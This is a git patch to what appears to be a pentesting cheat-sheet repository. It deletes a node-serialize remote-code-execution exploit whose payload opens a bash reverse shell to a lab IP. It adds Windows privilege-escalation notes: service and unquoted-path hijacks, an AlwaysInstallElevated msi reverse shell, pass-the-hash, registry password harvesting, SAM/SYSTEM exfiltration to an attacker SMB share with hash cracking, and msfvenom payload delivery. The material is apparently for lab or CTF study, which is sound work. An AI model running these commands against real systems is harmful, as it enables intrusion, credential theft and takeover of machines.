From b35bcc556056a7356c20caed358f799faf10902d Mon Sep 17 00:00:00 2001
From: whx
Date: Sat, 16 Oct 2021 00:40:15 +0200
Subject: [PATCH] bump
---
 49552.py | 47 -------------------
 enumeration/windows/sysinternals.md | 19 ++++++++
 .../windows/docs/always_installed_elevated.md | 17 +++++++
 exploit/windows/docs/pass_the_hash.md | 7 +++
 exploit/windows/docs/password_in_registry.md | 25 ++++++++++
 exploit/windows/docs/potatoes.md | 7 +++
 exploit/windows/docs/unquoted_path.md | 13 +++++
 post_exploitation/docs/powershell.md | 16 +++++++
 reverse_shells/docs/msfvenom.md | 11 ++++-
 9 files changed, 114 insertions(+), 48 deletions(-)
 delete mode 100644 49552.py
 create mode 100644 exploit/windows/docs/always_installed_elevated.md
 create mode 100644 exploit/windows/docs/pass_the_hash.md
 create mode 100644 exploit/windows/docs/password_in_registry.md
 create mode 100644 exploit/windows/docs/potatoes.md
 create mode 100644 exploit/windows/docs/unquoted_path.md
diff --git a/49552.py b/49552.py
deleted file mode 100644
index a3a1701..0000000
--- a/49552.py
+++ /dev/null
@@ -1,47 +0,0 @@
-# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
-# Exploit Author: UndeadLarva
-# Software Link: https://www.npmjs.com/package/node-serialize
-# Version: 0.0.4
-# CVE: CVE-2017-5941
-
-import requests
-import re
-import base64
-import sys
-
-url = 'http://10.10.216.3/' # change this
-
-payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
-"return function () {"
-"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
-"console.log('still inside');"
-"const { exec } = require('child_process');"
-"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
-"}"
-"})(require('http').ServerResponse.prototype.end)")
-
-# rce = "_$$ND_FUNC$$_process.exit(0)"
-#code ="_$$ND_FUNC$$_console.log('behind you')"
-#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
-#code = "_$$ND_FUNC$$_" + payload
-
-code = "_$$ND_FUNC$$_console.log(1)()"
-#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
-#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
-#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
-code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();"
-string = '{"email": "'+code+'"}'
-
-print code
-
-cookie = {'session':base64.b64encode(string)}
-
-response = requests.post(url+"?email="+code).text
-print response
-
-#try:
-# response = requests.get(url, cookies=cookie).text
-# print response
-#except requests.exceptions.RequestException as e:
-# print('Oops!')
-# sys.exit(1)
diff --git a/enumeration/windows/sysinternals.md b/enumeration/windows/sysinternals.md
index c08734d..c9853ba 100644
--- a/enumeration/windows/sysinternals.md
+++ b/enumeration/windows/sysinternals.md
@@ -89,9 +89,28 @@ regjump HKLM
 ```
 reg query HKLM
 ```
+```
 Get-Item
 Get-ItemProperty
 ```
 
 ## Strings
 Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
+
+## Create a system authority shell
+1. Check permissons
+```sh
+accesschk.exe /accepteula -uwcqv user
+```
+2. Query service
+```sh
+sq qc
+```
+3. Set service config to the msfvenom reverse shell, uploaded previously.
+```
+sc config daclsvc binpath= "\"C:\shell.exe""
+```
+4. Start service and gain high priv shell
+```sh
+net start daclsvc
+```
diff --git a/exploit/windows/docs/always_installed_elevated.md b/exploit/windows/docs/always_installed_elevated.md
new file mode 100644
index 0000000..23da332
--- /dev/null
+++ b/exploit/windows/docs/always_installed_elevated.md
@@ -0,0 +1,17 @@
+# AlwaysInstalledElevated
+
+* Watch out for `AlwaysInstalledElevated` keys inside the registry via
+```sh
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+```
+* Prepare reverse shell on attacker as an msi file
+```
+msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o shell.msi
+```
+* start the msi on target
+```sh
+msiexec /quiet /qn /i C:\shell.msi
+```
+
+
diff --git a/exploit/windows/docs/pass_the_hash.md b/exploit/windows/docs/pass_the_hash.md
new file mode 100644
index 0000000..6639a00
--- /dev/null
+++ b/exploit/windows/docs/pass_the_hash.md
@@ -0,0 +1,7 @@
+# Pass the Hash
+
+* Authenticate with retrieved hash
+* User evil-winrm or
+```
+pth-winexe -U 'admin%hash' // cmd.exe
+```
diff --git a/exploit/windows/docs/password_in_registry.md b/exploit/windows/docs/password_in_registry.md
new file mode 100644
index 0000000..729e4a6
--- /dev/null
+++ b/exploit/windows/docs/password_in_registry.md
@@ -0,0 +1,25 @@
+# Password Inside Registry Key
+
+* Query passwords saved inside the registry
+```sh
+reg query HKLM /f password /t REG_SZ /s
+```
+* Admin Autologon credentials
+```
+reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
+```
+* On attacker, change the credentials on target
+```sh
+winexe -U 'admin%password' // cmd.exe
+```
+
+## List other Creds
+```
+cmdkey /list
+```
+* Open reverse shell
+```sh
+runas /savecred /user:admin C:\shell.exe
+```
+
+
diff --git a/exploit/windows/docs/potatoes.md b/exploit/windows/docs/potatoes.md
new file mode 100644
index 0000000..2789fe6
--- /dev/null
+++ b/exploit/windows/docs/potatoes.md
@@ -0,0 +1,7 @@
+# Potatoes
+
+* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/)
+* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
+* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
+* [Juicy Potato](https://ohpe.it/juicy-potato/)
+* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md
new file mode 100644
index 0000000..8aa73d6
--- /dev/null
+++ b/exploit/windows/docs/unquoted_path.md
@@ -0,0 +1,13 @@
+# Unquoted Path
+
+* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
+* Some part of path has to be writeable.
+## Example
+* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
+```sh
+copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
+```
+```sh
+net start
+```
+
diff --git a/post_exploitation/docs/powershell.md b/post_exploitation/docs/powershell.md
index 7d0def6..9de1f48 100644
--- a/post_exploitation/docs/powershell.md
+++ b/post_exploitation/docs/powershell.md
@@ -6,3 +6,19 @@ save HKLM\SAM C:\Users\Administrator\Desktop\SAM
 save HKLM\SAM C:\Users\Administrator\Desktop\System
 ```
 * Use `samdump2`
+
+## Extract Hashes
+* Extract via smb server on attacker
+```
+copy C:\Windows\Repair\SAM \\\dir\
+copy C:\Windows\Repair\SYSTEM \\\dir\
+```
+* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
+```
+python pwdump.py SYSTEM SAM
+```
+or
+```
+hashcat -m 1000 --force /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
+```
+
diff --git a/reverse_shells/docs/msfvenom.md b/reverse_shells/docs/msfvenom.md
index ed894d2..815515f 100644
--- a/reverse_shells/docs/msfvenom.md
+++ b/reverse_shells/docs/msfvenom.md
@@ -20,7 +20,7 @@ msfvenom -p
 
 ## Windows
 ### x64 Reverse Shell in exe format
 ```
-msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST= LPORT=
+msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST= LPORT=
 ```
 ### x86 shikata_ga_nai
@@ -51,6 +51,15 @@ or on cmd.exe
 ```sh
 certutil -urlcache -split -f http://:/shell.exe
 ```
+* Using SMB
+On attacker
+```sh
+sudo python impacket/examples/smbserver.py dir .
+```
+on target
+```sh
+copy \\\dir\shell.exe C:\shell.exe
+```
 
 ## Unix
 ### netcat reverse